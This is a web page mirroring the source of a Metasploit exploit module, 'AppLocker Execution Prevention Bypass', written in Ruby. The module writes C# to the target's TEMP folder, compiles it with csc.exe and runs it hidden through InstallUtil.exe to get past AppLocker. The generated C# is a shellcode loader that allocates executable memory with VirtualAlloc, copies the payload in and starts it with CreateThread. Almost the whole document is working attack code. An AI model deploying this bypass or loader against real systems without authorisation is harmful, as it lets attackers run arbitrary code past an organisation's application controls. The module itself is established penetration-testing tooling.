Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/applocker_bypass.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::FileDropper

10
  include Msf::Post::File

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'AppLocker Execution Prevention Bypass',

17
        'Description' => %q{

18
          This module will generate a .NET service executable on the target and utilize

19
          InstallUtil to run the payload bypassing the AppLocker protection.

20


21
          Currently only the InstallUtil method is provided, but future methods can be

22
          added easily.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Casey Smith', # Original AppLocker bypass research

27
          'OJ Reeves' # MSF module

28
        ],

29
        'Platform' => [ 'win' ],

30
        'Arch' => [ ARCH_X86, ARCH_X64 ],

31
        'SessionTypes' => [ 'meterpreter' ],

32
        'Targets' => [ [ 'Windows', {} ] ],

33
        'DefaultTarget' => 0,

34
        'DisclosureDate' => '2015-08-03',

35
        'References' => [

36
          ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']

37
        ],

38
        'Compat' => {

39
          'Meterpreter' => {

40
            'Commands' => %w[

41
              stdapi_sys_process_execute

42
            ]

43
          }

44
        },

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52
  end

53


54
  # Run Method for when run command is issued

55
  def exploit

56
    if payload.arch.first == ARCH_X64 && sysinfo['Architecture'] !~ /64/

57
      fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')

58
    end

59


60
    # sysinfo is only on meterpreter sessions

61
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

62


63
    execute_installutil

64
  end

65


66
  def execute_installutil

67
    envs = get_envs('TEMP', 'windir')

68


69
    dotnet_path = get_dotnet_path(envs['windir'])

70
    print_status("Using .NET path #{dotnet_path}")

71


72
    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"

73
    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

74


75
    installutil_path = "#{dotnet_path}\\InstallUtil.exe"

76


77
    print_status("Writing payload to #{cs_path}")

78
    write_file(cs_path, generate_csharp_source)

79
    register_files_for_cleanup(cs_path)

80


81
    print_status("Compiling payload to #{exe_path}")

82
    csc_path = "#{dotnet_path}\\csc.exe"

83
    csc_platform = payload.arch.first == ARCH_X86 ? ARCH_X86 : ARCH_X64

84
    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

85
    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

86


87
    print_status("Executing payload ...")

88
    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")

89
    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", { 'Hidden' => true })

90
    register_files_for_cleanup(exe_path)

91
  end

92


93
  def get_dotnet_path(windir)

94
    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == ARCH_X86 ? '' : '64'}"

95
    paths = dir(base_path).select { |p| p[0] == 'v' }

96
    dotnet_path = nil

97


98
    paths.reverse.each do |p|

99
      path = "#{base_path}\\#{p}"

100
      if directory?(path) && file?("#{path}\\InstallUtil.exe")

101
        dotnet_path = path

102
        break

103
      end

104
    end

105


106
    unless dotnet_path

107
      fail_with(Failure::NotVulnerable, '.NET is not present on the target.')

108
    end

109


110
    dotnet_path

111
  end

112


113
  def generate_csharp_source

114
    sc = payload.encoded.each_byte.map { |b| "0x#{b.to_s(16)}" }.join(',')

115
    cs = %Q^

116
using System;

117


118
namespace Pop

119
{

120
  public class Program { public static void Main() { } }

121


122
  [System.ComponentModel.RunInstaller(true)]

123
  public class Pop : System.Configuration.Install.Installer

124
  {

125
    private static Int32 MEM_COMMIT=0x1000;

126
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

127
    private static UInt32 INFINITE = 0xFFFFFFFF;

128


129
    [System.Runtime.InteropServices.DllImport("kernel32")]

130
    private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

131


132
    [System.Runtime.InteropServices.DllImport("kernel32")]

133
    private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

134


135
    [System.Runtime.InteropServices.DllImport("kernel32")]

136
    private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

137


138
    public override void Uninstall(System.Collections.IDictionary s)

139
    {

140
      byte[] sc = new byte[] {#{sc}};

141
      IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

142
      System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);

143
      IntPtr id = IntPtr.Zero;

144
      WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);

145
    }

146
  }

147
}

148
    ^

149


150
    cs

151
  end

152
end

153


154